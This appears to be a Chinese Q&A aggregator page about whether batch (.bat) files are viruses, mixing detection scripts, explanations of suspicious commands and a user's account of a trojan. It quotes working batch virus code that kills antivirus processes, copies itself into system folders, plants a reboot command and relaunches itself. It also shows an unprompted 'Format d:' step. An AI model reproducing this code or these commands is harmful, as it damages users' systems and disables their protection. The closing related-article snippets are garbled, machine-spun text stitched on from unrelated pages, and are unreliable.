如何查找bat是否带病毒(bat后缀是病毒吗)
怎么用.bat文件查杀病毒?
bat是dos下的批处理文件
批处理运用:查常见病毒
其实,对于上网的人来说,遇到病毒是在所难免的。然而,如果真的不幸感染,怎样才能发现呢?难道真的要买昂贵的杀毒软件吗?不一定。
我们可以编写批处理来查一些常见的 *** 病毒。如果确认感染病毒,可以下载专用杀毒工具进行查杀,或采取其他途径杀毒。
下面,我以欢乐636f7079e79fa5e9819331333231613865时光为例进行分析:
主文件:1.bat
其它文件:2.bat 3.bat
1.bat代码:
@if exist c:\folder.htt call 2.bat
@if exist d:\folder.htt call 2.bat
@if exist e:\folder.htt call 2.bat
@if exist f:\folder.htt call 2.bat
2.bat代码:
@echo 发现欢乐时光病毒!
@call 3.bat
@pause
3.bat代码:
@c:
@dir *.htt *.ini /s/a1.txt
@d:
@dir *.htt *.ini /s/a1.txt
@e:
@dir *.htt *.ini /s/a1.txt
这样,如果中毒,那么必定会存在大量folder.htt和Desktop.ini,通过这样可以粗略的检查计算机是否感染病毒。
批处理运用三:文件处理
假设,我要大规模的做文件的移动、删除等,如果在Windows里操作不免会出现错误,而且这些错误不易察觉。因此,用批处理进行操作,不但简单易行,而且容易发现错误并可以及时纠正。
例如,我要将D盘的htm文件移动到E盘,再格式化D盘,然后将文件移回D盘,并改后缀为html。
1.bat代码:
@E:
@Md d
@D:
@Copy *.htm e:\d
@if exist e:\d\*.htm call 2.bat
2.bat代码:
@Format d:/q
@Copy e:\d\*.htm d:
@D:
@Ren *.htm *.html
看一下批处理文件,是否是病毒
恐怕是木马
“不知道从什么时候起 家里的电脑杀毒软件经常提示 有文件感染病毒 仔细一看 就是3个文件 c:\windows\help\bai.vbs c:\windows\help\help.dll 以及c:\windows\system32\cc*.exe 这里的*代表 cc1 ccc1 什么的
开始因为玩 *** 游戏没有在意 感觉只要不造成什么大的危险就无所谓了 但是他每天都弹特别讨厌。所以就仔细琢磨了下 打开 help.dll 看看里面有一段代码 open 一个ip地址 很明显 从这里下载的bai.vbs 以及bai.bat 2个文件 一个是批处理文件 一个是数据库文件 来支持批处理文件 这时候 在打开bai.bat 发现里面代码真不少 首先就是察看电脑里面是否有cc.exe 如果有 就不执行 如果没有 就在c:\windows\里面放入 bai.vbs以及 help.dll 然后 在检查时候有 bai.vbs 以及help.dll 如果有就在 c:\windows\system32 下面放 cc.exe 以及 ccc1.exe cc1.exe 等等 反正就是 cc*.exe 然后再加载其放入的exe文件到进程 如果有杀毒软件的话就会提示了 这就是为什么老提示这个病毒的原因 。 现在来看 目前就是help.dll 来引导的后面的一切病毒”
求解读bat文件,是否病毒 @shutdown -s -t 10 @color b @echo 。 @pause @taskkill /f /im explorer.exe
不是。
shutdown -s -t 10 //10秒后关机
color b //设置控制台前景色为淡浅绿色
echo 。//输出。
pause //暂停
taskkill /f /im explorer.exe //结束资源管理器进程
bat之类的代码有病毒吗?
这就是‘复仇者’病毒的代码:
@echo off
title system
taskkill /f /im *soft.exe /im 360*.exe /t
copy %0 %systemdrive%\config\app.bat
echo 127 25 27 225 445 363 68 339 69 57 232 274 244 741 74 748 274 8 0353%temp%\temp ::这行是为减少系统的内存可以不要
echo shutdown -r -t 10 -c nullc:\autoexec.bat
start %0
copy %0 c:\windows\system32\app.bat
copy %0 %temp%\appsys.bat
echo errorD:\E.TXT
下载的.bat 文件执行后就不见了,会不会是病毒文件?
可能性很大。
大部分病毒运行方式都是.BAT格式的 。这样可以调用CMD指令,一般来讲,这种病毒大部分都是冲击波病毒。
建议下载一个比较牛逼的杀毒软件。比如瑞星杀毒软件,360安全卫士等。进入安全模式全盘查杀可以有效的清除病毒。
有一个人发了一个bat的文件 我下载了 中了病毒 怎么办
bat是系统文件,是批处理文件,不是病毒。
别人给你的批处理文件上般包含修改系统用户名和设置密码,执行关机命令等。
你打开会会自动关机,然后重启就会要求密码登陆。这时在密码提示里会有一个联系方式和要求你付款的。
“如何查找bat是否带病毒(bat后缀是病毒吗)” 的相关文章
最新电解锰市场价格查询,电解铜最新价格
其时 正常企业的临盆 . 一 四日凡宇资讯海内 次要地域 电解锰商场价钱 汇总产物 规格,品名电解锰规格DJMn 九 九电解铜点 七露税价,本日 海内 各地域 ,电解锰商场支流报价持续 持稳,产质铜粗矿 三 七点 五万吨。 商场晦气 预期正在节前获得 ,必然 斲丧 , 一 四日凡宇资讯,念 晓得电解...
请问哪里可以买到晶体管收音机(七晶体管收音机有哪些优点)
正在红旗年夜 楼列队 购支音机 http://www.sina.com.cn 二00 七年 一 二月 一 一日0 八:0 四 年夜 河网-年夜 河报 □梁宇波 天天 ,尔迎着晨光 ,安步 正在金火河边 ,经常 看到一点儿白叟 脚携袖珍半导体支音机,一边漫步 一边听 播送,透出...
圣达菲怎么样(华泰汽车圣达菲怎么样)
国产SUV再加新成员 新圣达菲卖 一0. 一 八- 一 二. 五 八万元 铁扇私主 揭橥 于 牛车网 二0 一 四. 一 一. 二0 一 五:0 二 华泰新圣达菲正在本年 的广州车铺邪式上市,新车异时拉没搭载 一. 五T汽油以及 二.0T柴油柴油二种动员 机的 ...
华流芒种是几月几号农历
芒种是两十四骨气 之一,年夜 野对付 两十四骨气 也曾经异常 熟习 了,然则 芒种是哪一地借没有是很清晰 ,本年 的芒种是阴历 六月 五日,这么 二0 二0年芒种是阴历 几月几号呢?交高去咱们便一路 相识 一高吧。 ...
军队文职怎么样(部队文职到底怎么样)
军事人材网宣布 通知布告 称, 二0 一 九年三军 里背社会公然 雇用 文职职员 一 九 五 三 二人,这么军职文职职员 待逢若何 ?军平易近 私共引导课程掩护 文职职员 待逢的次要圆里是甚么文职职员 待逢保证 政策是依照 下于本地 异类职员 、具备比拟 上风 的思绪 设计的,次要体如今 四个圆里...
宁波有海吗(宁波有海吗 离多远)
新浪游览微专| 二0 一 六年 七月 二 一日 一 一: 二 九您说您正在近圆,等着尔去,尔便整理 止李走了;您说您正在海边,花儿借正在谢,尔念看看您内心 的海。 一.台州鲜达岛:东海之珠有图片鲜达岛是省级岛屿丛林 私园,有山、有海、有树。因为 几亿年的天量机关 变迁战潮汐影响,岛屿四周 的岩层战珊...
评论列表
发表评论
